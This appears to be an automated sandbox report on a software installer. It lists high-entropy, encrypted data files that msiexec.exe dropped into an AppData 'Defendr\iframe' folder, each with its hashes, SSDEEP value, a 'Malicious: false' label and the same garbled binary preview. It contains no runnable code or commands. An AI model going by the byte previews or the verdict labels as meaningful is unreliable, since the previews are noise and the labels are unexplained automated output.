Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv3.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	103242
Entropy (8bit):	7.998070019674833
Encrypted:	true
SSDEEP:	3072:obI5molIWlq0BxiLaYx78MBN90hU7gPqarJL7A:/soKWlHB3sgMl0hU7qqarJA
MD5:	C0300FC156DB04F541F7ED73F9FDBF8D
SHA1:	5F832818E0F6B3FB867132B3029DF65846D2DA7B
SHA-256:	363F0AC6CBCA8A470E1974AB22630E5CEA1862260136681E890D9DB5FAF8F6CD
SHA-512:	08F3E05C60680BFA8E2F9A01C10DDB1BC8A811022FA30E8E4F85288C630384737DF2A50F431725142D7E6C3CEB379CB8098E0C7E53BDB510A2C2F01A229284C3
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv3.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	51985
Entropy (8bit):	7.996722146000946
Encrypted:	true
SSDEEP:	1536:BW6JL+upCfhsjQCT+k8aXj5wnH4P4Yb2PNr9PDKNSc5A:oG+xfhfC6EtAZYb8NFDjcO
MD5:	6F3F2AB7AFE7A02426C29B531A1E2059
SHA1:	4DC70B7C61290ACDA9018EB6CC232B5FF1489B90
SHA-256:	BAE2F04E13BF7FC6E3E17C37B5DB13A227A9F4FA715E1B4A854A836FF549DDE2
SHA-512:	D4D1FBE47907FAE1A9E8B574D8024BCF447BDD40AD31C59044A9DB1E76A66694674FF8CC2941610F70A2ED8B856CBC8F2C58F287F6EEB7204DF6212F3D3305E3
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv3.2.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	35504
Entropy (8bit):	7.9954059317529005
Encrypted:	true
SSDEEP:	768:BW6NQoNJKDsIp65+iKvPZhaUnSgIt+Gng9DuwX1cpsrh3RqfXacIS:BW6+oXTHeTaUnSFDn09X1CuRqfXau
MD5:	BCC3E81F72C645434C9481A2116C60C0
SHA1:	292C7B2855A68CD0D73A1463E2BB813D35545828
SHA-256:	D9F8F7214FBAB1A34E05A598294A8334D349805E6769055BE2156A9DD0B6DABC
SHA-512:	E7C33B0A9A1241831B16AE67852077F3B33B7981606BE961D8468426F6B74C3CB0350E714DA3FD9648F17F679049E6E55AD7C50D28AD1B466E3395B914E660A0
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv30.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	105116
Entropy (8bit):	7.998285268709793
Encrypted:	true
SSDEEP:	1536:BW6xUV3Pu+H8iG2VSSR46tZRW4paQXjxOSbIdzsEJ2D+BE9SlIUry3Hrs2lf0UJY:oYUVJG2nDTIIaD2kzrE+BDn+Xrs2HBK
MD5:	FCFC417613F8478F23B9C140BB23F4A7
SHA1:	E7E01B23F7676D2C0800010306E7361532B9B71A
SHA-256:	C97DEC1EC391C52D9A46BBB89E5930E9AE550D7052C143C5FB682ED713DE2211
SHA-512:	EDE0D546287D8EAAF4BC12A094F568B3B9DBDE21C29729A387F6DBE482EDF013A7C9757DAD7B71B392A0BF3342C0DFD134AF01F36D9B02DBAB292A05FACB7EAB
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv30.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	37229
Entropy (8bit):	7.994543928422013
Encrypted:	true
SSDEEP:	768:BW6NJKtpB5oVnsUMBcDf3fRZV6ioyxr1nThx+B0LZssfebqc:BW6Xs5EsFcjV6Ny/hDLZssBc
MD5:	6C2BC1DA0BBABB0DF6F041BA937A20B5
SHA1:	CF937FE32F3547B7DC36BB5CAA1A6935F6EBF96D
SHA-256:	123F6347C23DB951962166C5FAC65FA4807E2A1167143608A9701E8485CD903E
SHA-512:	E1A805EC88FCD9AC15F420E3A766A9ED41D57D8BFD104C9D4326D3C4EF91D56B5985A7971FAA36879C5315F1060E301609D2E217FF6AEEF1CF27E5EC51D08D12
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv31.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	100022
Entropy (8bit):	7.9981863880802235
Encrypted:	true
SSDEEP:	3072:okH6QTNR1VHEgWRq521huDxmFscVDWzsO:WKrNW71WTcVDA5
MD5:	6E48EF4B588D5002062771F83B511CA0
SHA1:	F62D62F9EA643704E4265A5765157743FCE5B794
SHA-256:	CADB718A410A980F1AF13CA8A1036CB2F39D7D4FC9950C87835C4EA52096AB0B
SHA-512:	DEAED369CC05F5B4AE8890D9900F1A5F20501EF53B3938C32E9EACEA943C7F30AD544642D07BAE679B8E842595EB4C2F20ECE442075A77024CFCAF00740CF117
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv31.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	31714
Entropy (8bit):	7.993413464931367
Encrypted:	true
SSDEEP:	768:BW6NmHGlxxDckhL+OHikgd6UsbsZf9VD4+1BvnZYr4zN:BW6oGlgCL+msPZfo+bZYra
MD5:	49B41606048FB6579B5C827AD76BEFA0
SHA1:	3F7576EEB4DF5F05CEEF96F4987B94D3BB539A5D
SHA-256:	973FA4E3E481F20E7EC967C2E187BBC36190855B23863395672AB3BA273E2619
SHA-512:	96206542B22540982A0A9B485140541B9A5368CEC77FBA126C5BDF8FBA223015C44157E1A77E15D936C4B86E94CC9017D1A58682F73EDBFB5C438FB496416321
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv32.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	100086
Entropy (8bit):	7.9982240430769815
Encrypted:	true
SSDEEP:	3072:onIwmSjknvnvYoANpvMQ1gM9zvMsPxZxBV56r:mmSjqnH0v/gM1M07V56r
MD5:	ED55D55ACBF2BC589FF4137F91BA917B
SHA1:	1DD3FF5BB16B506456E25715D3DC3AA46DDB1794
SHA-256:	B45B6C087B04A99B7E0B08ACA4D8A3669E195670F9EBE3B8296EAF06D54EBCB4
SHA-512:	5FED35382747A4C24766338C8E976C656F407DBC24BFBFE8AD18780598E64AA1D2793C21282ECA0535A14DF2F993C4090D54789B018C0449E1E7BC5373B2F935
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv32.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32338
Entropy (8bit):	7.994565423368479
Encrypted:	true
SSDEEP:	768:BW6Nz95veaYU+eg/V6ohlSRbwqxXofCVY4akXEr1hCpF19ed:BW6XpeG7uY8qxXsAXdpUd
MD5:	DC6D00260945F7978A7BBB54898ABDE8
SHA1:	27626BCB0CD95894877A0F8EAC9F4849AD9A0C08
SHA-256:	5973EA970E87174BE790CF7920EF106E8826927C68A3932176EC83D9FC845BE2
SHA-512:	344AD352CA33C033AA50E14C6266DA2BED5C2DCD3E021B0C443C0309480D8AD976584C0A6645B37DAD5A32FADB978638D80ECEFA2ABDFDDCDC4CBE820175810B
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv33.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	88680
Entropy (8bit):	7.99747844792325
Encrypted:	true
SSDEEP:	1536:BW6NdgzKOR1dmPa5YfUp0xHauMB8oBGf5XN9jlPOJcIzEuHBw1v2yQgBIN:o46KOndmPa5Af5FM+oGNT25zEI0BQTN
MD5:	7DD26494230197E3554FBE5CEFB303FF
SHA1:	615E61F246115B019438B2AEE6E0F4199768F374
SHA-256:	ECCBB604596DFD593B795BEC0C04CB985C701A01EE50D21AA58367D25E3993AE
SHA-512:	1282E8BC55AEDEC378AA9BF3B5FBB147DDE9F5DDD2A445E0201FAF849FCD8392F07207DE626DA378E38986C400ED1F1980FCDD508FEB40348F1B410B5509C6F9
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv33.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	44819
Entropy (8bit):	7.9960755318335
Encrypted:	true
SSDEEP:	768:BW6NuezPOzo1eMVaDwVlvDA8kgKrfMsB006pWPxGOaFB6iiZ+2rqCGyVSS38C500:BW6oe0oYMVacnA8kFrfTB006+8xF4dr3
MD5:	75D904723AA149166E0FDB850E933171
SHA1:	BC39EC23774AA7D964566CBAF35C23F6752E2FEE
SHA-256:	A9D5D5873CA1713C2C7C172109E127ED943014EEF0CAED269CA3354FDB373416
SHA-512:	C875E536B120798DA9C5BDAD351F2F21BEB35A3D6EB70BDFB6F38D9700333920035944282D21C4AB45ABA6C4356721FB01670D2D7A120D104C2A1D39782C2149
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv34.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	99037
Entropy (8bit):	7.997888245921803
Encrypted:	true
SSDEEP:	1536:BW69IScAcb+rCsJoAQvm7LLsIw3o1QAyd5mp9aVWzABY/rkdeUmVgjpjpau/KGrd:oi3W+rCi2csFKm/VtBYAd70u/9wJF52
MD5:	9DDC5E19AFDF801947E63E9F1A4CB172
SHA1:	20A2A279E7E619FBB293500559F5485FCCD8101B
SHA-256:	3209106CEAC1D911D2B5BEF0EF2441E9285AB933701BE9E4B9749C773B83FDAA
SHA-512:	8D07AF43F5AC27ED332C8AA8B1F6D9AF92E4025D233124E77C1B433C5AEC8958AD31A4B618B066DE6AB62165134315EF949C6A2BB10BE31CA797ECBA528C5DAB
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv34.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	38199
Entropy (8bit):	7.994828083625625
Encrypted:	true
SSDEEP:	768:BW6NMP+zF9wefol+psQuQa3h+IVbL3Z+qOMy5EKxAR:BW6lFykna+SXZ+qOMtKWR
MD5:	BA63FE08745649EF7409FB4B46CCC9A4
SHA1:	41183AF44A3F948952D72E609934D58F6AE7C77F
SHA-256:	BAE33927C53C629FBAECB3A6578C128FEB37A9F49FBB6AC8BDF8CC6386BE6FA0
SHA-512:	9D9E4AD92A96D3160F8392231021316659B791031E78BAD7A87E7722FAA50A8A704322B1D2C1E716B975C2FE45E904CA7B6BEA249C67E9E5F7984E079FC51579
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv35.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	99251
Entropy (8bit):	7.998066777711538
Encrypted:	true
SSDEEP:	3072:oDEhVsfQNllK8auRX075JV1vu4fO7HmER5:GEhVxjAwK5J3uiO7Hl5
MD5:	C9AC9354B7E5BF16E8A02D8912BE5B25
SHA1:	830CAE5E71F17FBA34DE2EB0A78EDAF21B09741B
SHA-256:	7BFC65C85AE5FBBDD681F92A3901A17BA9D7E5F55B705967812E53D2855C4244
SHA-512:	C5C96F652EDE2946B24C74DF6548DE72D29796BA3A66DF06138B898EEAEE1B5ECCF6CF84D31184792B7664F9BEB3021E357F5802906A0964AACE19E76F0AE5DD
Malicious:	false
